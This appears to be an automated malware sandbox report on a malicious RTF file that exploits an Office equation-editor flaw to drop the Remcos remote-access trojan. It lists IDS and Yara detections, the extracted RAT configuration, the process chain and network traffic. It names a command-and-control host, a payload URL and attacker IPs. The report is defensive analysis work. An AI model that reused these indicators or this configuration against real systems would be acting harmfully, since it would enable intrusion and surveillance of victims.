                  Source: Registry Key setAuthor: Joe Security: Data: Details: D6 56 DB 60 DE 12 D0 73 A9 44 4F CE 38 DA 70 92 05 4E CA F2 B5 0E 2B 7B D1 C5 5A B6 C6 1D 18 9C D7 C1 65 32 3A B8 3D E0 01 00 F0 AE 38 3E B9 B5 61 76 C5 36 79 0F 82 78 62 C3 9D 80 D9 E5 E1 4C E4 83 92 9E 70 71 D9 44 BD 76 87 C8 3F D7 8B 5E 3E 7B 2A 06 7A F2 2E AD 0E 91 1C 25 2E 4A 71 F0 27 3B 03 E7 79 5A 56 A5 A3 B7 19 0F FC 92 E3 D6 3E F0 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3792, TargetObject: HKEY_CURRENT_USER\Software\Rmc-7B1J99\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:33:12.763912+020020204231Exploit Kit Activity Detected185.29.10.5280192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:33:12.763912+020020204251Exploit Kit Activity Detected185.29.10.5280192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:33:16.344510+020020365941Malware Command and Control Activity Detected192.168.2.2249164192.210.150.2914645TCP
                  2024-09-26T10:33:18.064584+020020365941Malware Command and Control Activity Detected192.168.2.2249165192.210.150.2914645TCP
                  2024-09-26T10:35:10.442136+020020365941Malware Command and Control Activity Detected192.168.2.2249167192.210.150.2914645TCP
                  2024-09-26T10:35:10.536458+020020365941Malware Command and Control Activity Detected192.168.2.2249168192.210.150.2914645TCP
                  2024-09-26T10:35:15.745754+020020365941Malware Command and Control Activity Detected192.168.2.2249169192.210.150.2914645TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:33:18.153483+020028033043Unknown Traffic192.168.2.2249166178.237.33.5080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtAvira URL Cloud: Label: malware
                  Source: authurremc.duckdns.orgAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "authurremc.duckdns.org:14645:1", "Assigned name": "authur", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7B1J99", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for submitted file
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfReversingLabs: Detection: 39%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884633008.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884633008.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00404423 FreeLibrary,CryptUnprotectData,13_2_00404423
                  Source: powershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f3ff602d-e

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.powershell.exe.3cf0b60.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3680, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3792, type: MEMORYSTR
                  Office equation editor establishes network connection
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 185.29.10.52 Port: 80Jump to behavior
                  Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10006580 FindFirstFileExA,9_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Suspicious execution chain found
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global trafficDNS query: name: ia600100.us.archive.org
                  Source: global trafficDNS query: name: authurremc.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
